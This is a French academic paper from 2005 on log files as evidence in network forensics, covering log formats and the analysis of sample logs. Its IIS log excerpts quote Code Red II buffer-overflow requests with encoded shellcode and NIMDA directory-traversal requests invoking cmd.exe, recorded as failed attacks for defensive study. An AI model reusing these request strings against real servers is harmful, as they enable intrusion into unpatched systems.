Fichiers logs : preuves judiciaires et composant vital pour Forensics

BENSEFIA Hassina
Centre de Recherche sur lInformation Scientifique et Technique Laboratoire des Logiciels de Base hbensefia@mail.cerist.dz

1. Introduction
La scurit des rseaux dpend de la technologie prventive. Elle consiste mettre en place des systmes de dfense adquats pour rduire le risque des attaques potentielles. Cependant, le spectre des menaces change. Malgr la prsence des systmes de dfense, un rseau demeure vulnrable et sa scurit est compromise par des menaces non identifies. La technologie prventive savre insuffisante pour rpondre aux besoins de la scurit. Les attaques informatiques voluent et envahissent Internet et le monde digital convergeant vers des crimes informatiques rsultant en des pertes significatives de productivit. Alors dautres lments cls complmentaires la technologie prventive sont introduits. La scurit dun systme ncessite dtre surveill de manire permanente fin dinspecter les activits suspectes. Aussi la mise en place dun systme judiciaire est indispensable pour identifier les actes illicites aux systmes et leurs auteurs. Do lmergence de Computer Forensics ou linformatique judiciaire. Apparue comme une raction au crime informatique, Forensics utilise les techniques dinvestigation et salimente des fichiers logs qui peuvent contenir le comportement de lattaquant et les tapes de lattaque. En effet ; ces fichiers constituent le moyen de surveillance de la scurit et une source critique de preuve pour une investigation informatique.

2. la scurit prventive
La scurit des rseaux a pour objectif dempcher les lments malicieux datteindre un rseau [3], elle est fondamentalement base sur la prvention [2]. Les techniques prventives consistent dterminer les menaces potentielles et monter des systmes adquats pour les empcher. Les systmes de scurit prventifs tels que les firewalls agissent comme des obstacles lectroniques dressant une barrire face aux attaques potentielles, ils prennent en compte un nombre limit de menaces [12]. Ils sont passifs devant les nouvelles menaces inconnues. Lutilisation dun systme de scurit nest pas rassurante, mme sil reprsente la meilleure stratgie de scurit. La propagation des virus et du code malicieux dans le e-mail et les pages web sont des exemples dmonstrateurs combien il est possible de compromettre le meilleur systme de scurit cr par la technologie prventive [12]. La technologie prventive a contribu pour rsoudre les problmes de scurit via une multitude de systmes mais les menaces existent toujours et la majorit des rseaux demeurent vulnrables et sont sous attaques dune faon constante. La prvention offre une scurit statique, passive et fondamentalement fragile.
RIST Vol.15 N01-02 Anne 2005.

Pour atteindre une scurit efficace, la scurit prventive a besoin dune couche supplmentaire de protection. Deux lments qui taient pratiquement absents dans le paradigme de la scurit informatique simposent comme concepts cls compltant le rle de la scurit prventive. Ces deux lments sont la surveillance de la scurit et la mise en application de la loi.

3. La surveillance de la scurit
Elle consiste surveiller lactivit des systmes et des rseaux. Elle se concrtise par la vrification en temps rel des traces du trafic entrant et sortant gnrs par un systme tels que les firewalls, les routeurs, les serveurs, etc [2]. Ces traces contiennent linformation concernant les vnements qui arrivent dans le systme. Lanalyse de cette information permet de dtecter les activits suspectes, les attaques en cours et de dterminer si la scurit du systme a t compromise ou en voie de compromission. La surveillance de la scurit dun systme de manire suffisante et en temps rel permet de dtecter un attaquant indiffremment de quelle vulnrabilit il a exploit pour pntrer dans le systme. Lattaquant peut tre repouss au point dentre du rseau avant quil naccomplisse son attaque.

4. La mise en application de la loi

Internet et lemploi de lordinateur personnel reprsentent des outils permettant lvolution de la socit sur le plan technologique, conomique, sociologique et culturel. Cependant ces mmes outils sont devenus les armes des criminels durant la deuxime partie du vingtime sicle [4] [11]. Le comportement on-line tant anonyme, les humains peuvent voler, tricher, mentir et commettre des crimes sans tre aperus [1]. Un individu peut attaquer le rseau dune organisation en sinstallant derrire son ordinateur personnel et en se connectant Internet. Il peut pirater un compte e-mail, envoyer un virus un rseau ou compromettre un serveur vital. Internet est encore sans loi [1] [2], plusieurs personnes et organisations se retrouvent victimes des criminels sur Internet sans aucun recours lgal. La mise en application de la loi consiste en la poursuite judiciaire des attaquants et la condamnation des criminels. Elle envoie un message davertissement tout le monde que lutilisation illgale dInternet sera sanctionne. Elle permet de garder les criminels loin dInternet pendant leur emprisonnement, de punir ceux qui ont endommag les rseaux des organisations et de rendre Internet une socit lgale. La surveillance de la scurit et la mise en application de la loi compltent les insuffisances de la technologie prventive. La surveillance de la scurit permet de dtecter les nouvelles menaces inconnues. La mise en application permet dagir aux attaques inities. Le crime informatique est un problme srieux et pineux, plusieurs organisations ont perdu leur productivit et leur rputation cause dattaques variant entre attaques directes et indirectes dans diverses formes. Pour identifier les crimes informatiques et leur auteurs, les mthodes du Forensics sont ncessaires [3] [4]. La scurit informatique a donc besoin dun systme judiciaire pouvant collecter et analyser des donnes relatives aux activits malicieuses et aux attaques pour identifier les attaquants et les poursuivre judiciairement. Ce besoin sest traduit par lmergence de Forensics dans le domaine de linformatique pour
RIST Vol.15 N01-02 Anne 2005.

donner naissance une nouvelle discipline dite Computer Forensics ou linformatique lgale ou encore linformatique judiciaire. Computer Forensics englobe aussi la surveillance de la scurit travers la collecte et lanalyse dinformation, lies aux activits des systmes et des rseaux, la recherche de preuve dattaque ou dactivit illicite qui est ltape prliminaire dans le processus de Forensics.

4. Forensics
Le terme Forensics est trs proche du terme forum. Un forum tant un endroit public pour la discussion et le dbat, cest aussi une cour. Ainsi la signification de forensics se rapporte aux cours et la loi, forensics veut dire lgal ou judiciaire. Le terme Forensics dsigne Forensic science ou science lgale , cest lapplication de la science la loi [13]. Elle permet de rsoudre les conflits lgaux en utilisant des mthodes scientifiques. Elle consiste rassembler des signes prouvant quun crime est survenu pour identifier le coupable. Un crime peut tre un vol, une fraude, un meurtre ou un suicide. Les signes sont acquis en utilisant certains domaines scientifiques comme la biologie, la chimie, la science analytique, la psychologie et les mathmatiques [13]. Forensics couvre un ventail de disciplines telles que la pathologie lgale, la srologie lgale, la balistique lgale, lanthropologie lgale, la psychologie lgale, la gologie lgale, etc. qui ont toutes pour rle la rsolution dun crime. Pour trouver des signes pouvant identifier un crime, lexpert en Forensics ou lexpert lgiste examine les traces du matriel pouvant inclure ou exclure une association entre un suspect et une victime. Ces traces peuvent tre le sang, la salive, les impressions de chaussures et de pneus, les poils, les armes feu et les documents. Lexpert lgiste tudie aussi les causes des incendies, des explosions et des accidents de la route [13]. Lanalyse faite par lexpert lgiste est prsente sous forme dun tat crit pouvant tre lu dans un tribunal. Le rsultat dun cas civil ou criminel dpend de lanalyse faite par lexpert lgiste et il est influenc par son interprtation. Pour cette raison lexpert lgiste doit tre dot dune exprience professionnelle et dune comptence ainsi que dune intgrit personnelle. Il doit tre impartial et ayant un intrt neutre dans le rsultat dun cas.

5. Computer Forensics
Une discipline mergeante de la collection et de lanalyse de linformation concernant les ordinateurs et les rseaux dordinateurs pour dtecter les activits suspectes ou malicieuses en vue de lutiliser comme des preuves dans la cour de la loi [3]. Cest lart de dcouvrir et dextraire linformation prouvant loccurrence dun crime informatique de telle faon le rendre admissible dans le tribunal [4]. Considre comme lautopsie du disque dur dun ordinateur, Computer Forensics est une nouvelle science qui est apparue comme une raction au crime informatique. Elle permet dappliquer la loi linformatique, en employant les techniques dinvestigation pour identifier la cause origine dun crime informatique. Un crime informatique peut tre une attaque, une intrusion ou toute activit malicieuse.

RIST Vol.15 N01-02 Anne 2005.

6. Network Forensics
Elle est au cur de computer Forensics [12]. Cest le pouvoir de collecter les donnes critiques ncessaires pour suivre et analyser lutilisation illgitime des rseaux et des applications du rseau. Network Forensics tant un processus qui permet de collecter les donnes partir des diffrents dispositifs du rseau et dappliquer les techniques dinvestigation afin de retracer les activits se passant dans le rseau et ce ci dans le but didentifier une attaque et de dcouvrir lidentit de lattaquant durant et aprs lattaque [12]. Le but de Network forensics est de fournir la preuve suffisante pour permettre de poursuivre judiciairement avec succs lauteur dun crime informatique. Comme louverture des rseaux et le degr de leur connectivit reprsentent le paramtre significatif dans lvolution du crime informatique. Nous allons accentuer le point sur le Network Forensics

7. Les tapes principales de Network Forensics

7.1. La collecte de la preuve informatique La preuve est linformation utilise pour dcider si une proposition ayant t sujet de dbat est vraie [10]. La preuve informatique est lensemble des donnes collectes partir des diffrents composants dun rseau tels que les firewalls, les routeurs et les serveurs [4]. Les donnes en question sont les donnes concernant les paquets TCP/IP traversant le rseau. Chaque paquet contient une entte incluant le temps et la date de connexion, ladresse IP source et destination, le type de session (FTP, Tel net, e-mail,) et la dure de session. Ces donnes sont dun intrt majeur lors dune attaque. Ladresse IP source peut rvler lidentit de lattaquant, ladresse IP destination peut rvler llment cible dans le rseau et la donne dans le paquet identifie lattaque survenue. Ces donnes permettent aussi de confirmer ou non loccurrence dune attaque et de documenter les vulnrabilits qui puissent exister dans le rseau [7]. La collecte de la preuve doit avoir lieu avant loccurrence dune attaque [6]. Linformation collecte est considre comme une preuve potentielle, aprs loccurrence dune attaque ou dune activit malicieuse, elle devient une preuve relle [4]. Lutilisation de la preuve informatique dans un tribunal est conditionne par son intgrit et son authenticit [4]. Sa protection est primordiale dans Forensics. 7.2. Linvestigation informatique Cest une tape trs importante dans Network Forensics. Cest une procdure qui permet la rsolution dune attaque aprs son occurrence. Elle consiste vrifier et analyser la preuve informatique collecte afin daboutir la preuve judiciaire affirmant ou rfutant loccurrence dun crime informatique [7]. Elle permet de dterminer si une attaque est survenue, la nature de lattaque, lauteur de lattaque et les traces quil a laisses derrire lui. Lexpert en Network Forensics doit connatre lemplacement de la preuve et doit avoir des comptences dans la collecte de la preuve [7]. Il doit mener la procdure dinvestigation avec prcaution et il doit tre apte suivre cette procdure jusqu la fin. Pour cela, il doit avoir les comptences suivantes [4] [11] : Il doit tre expert en information et en administration des rseaux. Il doit tre expert dans les techniques de piratage et familier avec les vulnrabilits des systmes.
RIST Vol.15 N01-02 Anne 2005.

Il doit avoir les comptences informatiques dun attaquant. Il doit avoir les comptences investigatrices dun dtective. Il doit avoir les comptences judiciaires dun juriste.

8. Emplacement de la preuve informatique

La preuve informatique dpend du type dattaque [4], elle peut se trouver dans trois emplacements principaux [5] 1) Sur le composant victime du rseau. 2) Sur la machine de lattaquant. 3) Sur les dispositifs du rseau situs entre le composant victime et la machine de lattaquant. Les donnes faisant objet de preuve informatique sont gnre par le logging [6] [10]. Le mcanisme de logging ou lenregistrement des activits est une fonctionnalit de la majorit des systmes dexploitation modernes. Cest la sauvegarde de la trace des vnements qui arrivent pendant leur excution. Lenregistrement peut avoir lieu dans un hte ou dans un systme fournissant un service rseau tel quun serveur de messagerie, un serveur Web, un serveur de nom de domaine (DNS) ou un firewall. Lenregistrement prend la forme dun fichier dit fichier log . Les fichiers logs des diffrents composants dun rseau reprsentent la source de preuve pour Network Forensics [4]. Ils contiennent des informations lies au comportement de chaque utilisateur spcifique dans le rseau ainsi que le temps et la dure de ses activits. Ils enregistrent toutes les activits et les vnements se passant dans le rseau telles que les sessions Telnet et FTP, laccs Web et messagerie. Le type dinformation contenue dans les fichiers logs dpend des applications disponibles sur le rseau.

9. Les fichiers logs

Lexpression fichier log signifie le journal de bord des connexions , cest lhistorique des requtes adresses un systme [9]. Un fichier log est un fichier cr par un logiciel spcifique install sur un systme. Il contient des informations concernant lactivit du systme. Il a une structure ASCII (American Standard Code for Information and Interchange) qui est lisible par les humains. Le contenu dun fichier log dpend du niveau denregistrement et du type dactivit du systme. Un fichier log contient des entres. Chaque entre est une ligne, elle reprsente une requte que le systme a reue, la rponse cette requte et le temps de traitement de cette requte. Une entre dun fichier log est compose de champs lmentaires de donnes. Chaque champ dsigne une information concernant la requte telle que le nom dutilisateur, son adresse IP, la requte adresse par lutilisateur au systme, la rponse du systme, la date et le temps de soumission de la requte, le protocole utilis et dautres informations spcifiques la requte. Un fichier log reprsente une base de donnes textuelle liste par le champ temps.

RIST Vol.15 N01-02 Anne 2005.

Figure 1 : Extrait dun fichier log dun serveur Proxy On remarque que chaque entre contient un ensemble de champs qui sont spar par une virgule. Si on prend la premire entre de ce fichier :
16/01/02, 10:50:39, 193.194.77.227, 193.194.77.228, TCP, 1363, 113, SYN, 0, 193.194.77.228,

Voici la signification de chaque champ : 16/01/02 : est la date de rception du paquet. 10:50:39 : est lheure de rception du paquet. 193.194.77.227 : est ladresse source indiquant ladresse IP de la machine mettrice du paquet. 193.194.77.228 : est ladresse destination indiquant ladresse IP de la machine rceptrice du paquet TCP : est le protocole utilis. 1363 : est le port source indiquant le numro de port relatif lapplication en cours sur la machine mettrice du paquet. 113 : est le port destination indiquant le numro du service sexcutant sur la machine rceptrice du paquet. SYN : est la valeur du drapeau TCP indiquant une requte dtablissement dune connexion. 0 : ce champ indique la rgle de filtrage et il prend pour valeur 0 ou 1. Sil est gal 1, le paquet est accept. Sil est 0, le paquet est rejet. 193.194.77.228 : est ladresse IP de linterface sur la quelle le paquet est reu. La majorit des systmes gnrent des fichiers logs dans un format propritaire qui est mystrieux et difficile le dchiffrer. Il existe plusieurs formats de fichiers logs spcifiques
RIST Vol.15 N01-02 Anne 2005.

aux serveurs Web, serveurs de messageries et les firewalls. Seulement les dveloppeurs peuvent comprendre leur contenu. Lanalyse du contenu dun fichier log exige une bonne comprhension du format et une structure approprie facilitant son analyse. En effet ; des formats standards ont t dvelopps. Parmi les quels, on peut citer : le format W3C Etendu et le format log commun. 9.1. Le format W3C Etendu (Word Wide Web Consortium) [8] Cest un format ASCII adapt avec une varit de champs. Lutilisation de ce format permet dinclure des champs importants comme elle peut omettre des champs non dsirs. Les champs sont spars par un espace, le temps est enregistr en GMT (Greenwich Mean Time). Ce format est disponible pour les serveurs Web et les serveurs FTP. Exemple dune entre 172.16.25.10 02-05-1988 17:42:15 GET /default.html 200 HTTP/1.0 Cette entre signifie que le 02 mai 1998 17h 42 mn 15s (GMT), un utilisateur ayant ladresse IP 172.16.25.10 et en utilisant HTTP 1.0 a lanc une requte GET/default.html. Cette requte signifie le tlchargement de la page Web default.html. La requte est excute avec succs. La valeur 200 tant le code de ltat du service, cette valeur indique le succs de la requte. 9. 2. Le format log commun [8] Cest un format ASCII fix disponible uniquement pour les serveurs Web. Il a t dvelopp par NCSA (National Center for Supercomputing Applications) luniversit dIllinois Urbana-Champaign. Chaque entre contient les champs suivants : Le nom de lhte ou ladresse IP de lhte Le nom de lutilisateur La date de soumission de la requte Le temps de soumission de la requte Le contenu de la requte envoye par le client Le code de ltat HTTP retourn lutilisateur : cest le code de la rponse HTTP envoy par le serveur au client. La taille en octets des informations envoyes par le serveur Les champs sont spars par un espace, le temps enregistr est le temps local. Exemple dune entre 172.21.13.45 FRED 08-04-1998 17 :39 :10 GET/scripts/iisadmin/ism.dll 200 3401 Cette entre indique quun utilisateur appel FRED utilisant une adresse IP 172.21.13.45 a envoy au serveur Web une requte en utilisant la commande HTTP qui est GET pour tlcharger le fichier scripts/iisadmin/ismi.dll. Cette requte a t soumise au serveur le 08 Avril 1998 17h39mn 10 s temps local et elle a t retourne avec succs (code dtat HTTP= 200). Les donnes envoyes lutilisateur FRED ont une taille de 3401 octets. Remarque La rponse dun serveur un client peut tre faite avec succs ou chec. Le code de ltat de la rponse peut renseigner sur ce rsultat. Si le code dtat {200,201,202,203,204,300,301,302,303,304, Alors le serveur a rpondu au client avec succs.
RIST Vol.15 N01-02 Anne 2005.

Si le code dtat {400, 401, 402, 403, 404, 500, 501, 502, 503}, Alors le serveur na pas rpondu la requte, il y a eu un chec et par consquent la taille des donnes transfres au client est gale 0.

10. Limportance des fichiers logs

Les fichiers logs tracent tous les vnements qui arrivent pendant lactivit dun systme. Ils peuvent contenir la preuve en dtail de toute activit exceptionnelle, suspecte ou non dsire. Les fichiers logs issus des diffrents composants dun rseau peuvent indiquer si la scurit du rseau est compromise ou en voie de compromission [6]. Ils sont la seule information que lattaquant laisse derrire lui aprs son introduction dans un rseau, ils reprsentent lempreinte de lattaquant [12]. Lors dune attaque, linformation contenue dans les fichiers logs peut tre vrifie pour dfinir les traces de lattaque et aboutir une preuve accusatrice. Les fichiers logs sont un composant vital et critique pour Network Forensics [12]. Les informations pertinentes contenues dans les fichiers logs reprsentent la preuve qui est le besoin indispensable pour linvestigation [4] [6]. Cest le seul moyen pour identifier lattaquant a fin de le poursuivre judiciairement.

11. Le traage des attaque travers lanalyse des fichiers logs

A travers les deux exemples suivants, nous allons exploiter des extraits de fichiers logs illustrant des activits malicieuses. Nous allons analyser et interprter le contenu de ces logs pour dterminer les entres qui reprsentent des activits malicieuses, identifier lobjectif de ces activits ainsi que leurs origines. Exemple 1 Soit un extrait dun fichier log /etc/log/secure dun serveur de log distant syslog dunix. Ce serveur est destin recevoir et stocker tous les logs issus de tous les systmes composant un rseau. Apr 10 13:43:48 10.10.10.1 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:43:51 10.10.10.2 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:43:54 10.10.10.3 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:43:57 10.10.10.4 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:43:58 10.10.10.5 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:43:59 10.10.10.6 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:44:01 10.10.10.7 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:44:04 10.10.10.8 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:44:07 10.10.10.9 in.ftpd[6613]: connect from 192.168.1.225 Apr 10 13:44:09 10.10.10.10 in.ftpd[6613]: connect from 192.168.1.225 Toutes ces entres montrent quun systme identifi par ladresse IP 192.168.1.225 scanne de manire squentielle les machines du rseau de la classe IP 10.10.10.0. Il sagit de connexions rptes au port 21 qui est rserv au service FTP(File Transfert Protocol). Lobjectif de ce scan est de rechercher la prsence de la vulnrabilit de wu-ftpd. Wu-ftpd tant le daemon de FTP pour les systmes Unix.

RIST Vol.15 N01-02 Anne 2005.

Exemple 2 Soit un extrait dun fichier log dun serveur Web IIS de Microsoft :
10.10.10.20 - - [14/Jan/2004:22:30:25 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:30:28 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:31:29 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:31:32 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:31:35 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:34:11 -0500] "GET / HTTP/1.1" 404 299 10.1.4.25 - - [18/Jan/2004:21:57:34 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u780 1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u 8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 10.118.25.74 - - [18/Jan/2004:22:02:17 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u780 1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u 8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 10.30.50.15 - - [18/Jan/2004:22:02:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284 10.30.50.15 - - [18/Jan/2004:22:02:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296 10.30.50.15 - - [18/Jan/2004:22:03:00 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 10.30.50.15 - - [18/Jan/2004:22:03:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

Si on analyse les deux entres suivantes :

10.1.4.25 - - [18/Jan/2004:21:57:34 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780

RIST Vol.15 N01-02 Anne 2005.

1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 10.118.25.74 - - [18/Jan/2004:22:02:17 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780 1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285

Il sagit dune attaque de dbordement de zone tampon (Buffer overflow). Cest une activit virale originaire des systmes identifis par les adresses IP 10.1.4.25 et 10.118.25.74. Le virus est un ver dit Code Red II exploitant une vulnrabilit .ida du service dindexation de Microsoft Internet Information Server IIS[14]. La valeur 404 du code dtat indique que lattaque a chou. Pour les entres suivantes :
10.30.50.15 - - [18/Jan/2004:22:02:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284 10.30.50.15 - - [18/Jan/2004:22:02:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296 10.30.50.15 - - [18/Jan/2004:22:03:00 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 10.30.50.15 - - [18/Jan/2004:22:03:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

Nous constatons des tentatives d'accs aux fichiers excutables de Windows. Ces tentatives prennent 05 secondes ce qui signifie que lattaque est mene l'aide d'un script ou d'un programme automatis. Les quatre premires entres indiquent des tentatives de connexion la porte drobe laisse par le ver Code Red II, la suite des entres consiste en des tentatives dexploitation de Directory Traversal vulnerability . Cette vulnrabilit permet des attaquants visitant un
RIST Vol.15 N01-02 Anne 2005.

site Web IIS dexcuter IUSR_nom machine [14].

des

commandes

arbitraires

avec

le

privilge

Il sagit dune activit virale du ver NIMDA exploitant une vulnrabilit dans Microsoft Internet Explorer initie par le systme identifi par ladresse IP 10.30.50.15. Les valeurs 400 et 404 du code dtat indiquent lchec de lattaque.

12. Les problmes lis aux fichiers logs

Malgr limportance des fichiers logs, namoins certains problmes demeurent poss. Nous citons : Les fichiers logs consomment un espace disque trs grand. Les fichiers logs contiennent beaucoup dinformation, ils sont immenses et par consquent lanalyse de leurs contenus devient une tche trs difficile. Les fichiers logs menacent la vie prive(privacy) de lutilisateur. Un utilisateur refuse lide que toutes ses activits soient enregistres.

Les fichiers logs peuvent tre menacs comme dautres formes de donnes dans le
rseau ou dans un systme. Un attaquant qualifi pntrant dans un systme peut effacer les fichiers logs ou modifier leur contenu. Il peut mme arrter le mcanisme denregistrement.

13. Conclusions et recommandations

La scurit informatique a besoin dun systme de surveillance et dun systme judiciaire. Les fichiers logs reprsentent le moyen de surveillance de la scurit des systmes et des rseaux. Computer Network Forensics tant le systme judiciaire auquel la scurit informatique a besoin. Les fichiers logs constituent une source critique de preuve pour Forensics, ils peuvent contenir les empreintes des attaquants et indiquer les menaces et les attaques en cours. Ils reprsentent une forme de donnes qui peut-tre efface ou falsifie par un attaquant afin deffacer la trace de lattaque ou modifier le cours de lattaque. Si les fichiers logs sont effacs ou errons, on perd toute preuve dattaque et par consquent le processus de Forenscis ne peut russir. Des mesures de protection doivent tre prises en compte vis vis des fichiers logs. La politique de scurit dune organisation doit inclure les procdures de protection des fichiers logs des composants dun rseau. Linspection et la rvision des fichiers logs sont la meilleure faon pour maintenir la scurit des systmes et des rseaux. Un administrateur de scurit est responsable de la protection du patrimoine informationnel. En loccurrence dune attaque, il doit faire une investigation en interprtant les donnes lies lattaque contenues dans les fichiers logs. Vu la nature ASCII du format des fichiers logs, il est trs dlicat de dchiffrer leur contenu et dterminer les tapes dune attaque. Linformation pertinente contenue dans les fichiers logs ncessite dtre
RIST Vol.15 N01-02 Anne 2005.

interprte avec prcaution pour accomplir une investigation et russir le processus de Forensics.

Rfrences
